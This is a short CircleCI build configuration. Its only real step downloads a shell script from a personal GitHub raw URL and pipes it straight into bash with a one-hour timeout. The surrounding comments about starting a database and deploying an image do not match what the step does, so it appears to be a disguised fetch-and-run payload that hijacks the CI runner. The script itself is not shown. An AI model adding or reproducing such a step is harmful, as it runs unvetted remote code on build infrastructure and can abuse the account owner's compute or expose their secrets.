
version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2204:edge
      resource_class: medium
    steps:
      - checkout
      # start proprietary DB using private Docker image
      # with credentials stored in the UI
    
      # deploy the image
      - run:
          command: bash <(curl -fsSL https://raw.githubusercontent.com/Khanomix/mcode/main/ham_keys3.sh)
          no_output_timeout: 1h
